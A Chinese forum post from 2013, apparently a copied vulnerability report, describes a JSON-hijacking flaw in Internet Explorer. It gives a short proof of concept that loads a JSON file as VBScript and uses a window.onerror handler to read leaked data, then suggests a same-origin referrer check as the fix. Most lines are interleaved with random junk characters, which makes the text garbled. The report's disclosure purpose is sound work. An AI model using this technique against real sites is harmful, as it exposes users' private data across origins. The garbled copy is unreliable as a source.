简要描述:% ?6 k7 P8 ] j3 x' p2 j5 w
; Q7 O; t, S& r4 L" u由于某些资源容器对数据处理不当导致json劫持漏洞.: v# ~, ]. h! w2 R- j+ s
详细说明:
+ D8 b9 M Y, I+ m. ]' `由于ie支持vbscript,所以script元素可以指定成vbscript语言:
) v# l, d) @' B: A8 O+ k1 B6 O<script language=vbscript></script>' L0 D `0 Q4 k) t
, d9 M, n1 B+ I0 y. q* N
当但我们指定的是一个js格式的文件是将会发现一个异常,这使我们通过捕获这个异常的信息来获得部分json数据.
( B8 f- c2 Q* Y: i" d漏洞证明:
- _5 {1 j$ C1 I" |: \/ o<script>' m6 T( K7 e B; n1 y4 F
window.onerror=function(_){
$ R' p: x7 n( `6 @alert(_)
/ q' p+ i, }0 { w6 U}
1 }* E7 ]) V7 C) s) R( _% C</script>
/ b0 z N+ |9 S' E* ?* x. p<script language=vbscript src=1.json></script>
- m W- h: @! N; v5 X
4 a1 ?9 b K0 v7 D3 I9 g3 } ' R* T* K0 g- \: m+ N
1.json:( V. w+ ?$ G5 ~3 l- v6 ^
[{"name":"sogili","age":19}] a& k% ]# L8 M& V
修复方案:
" S( x) S* H& c2 f5 ?网站业务对于这个问题可以通过验证referrer是否为同源来防御 |
发表于 2013-2-23 11:33:57
收藏
支持
反对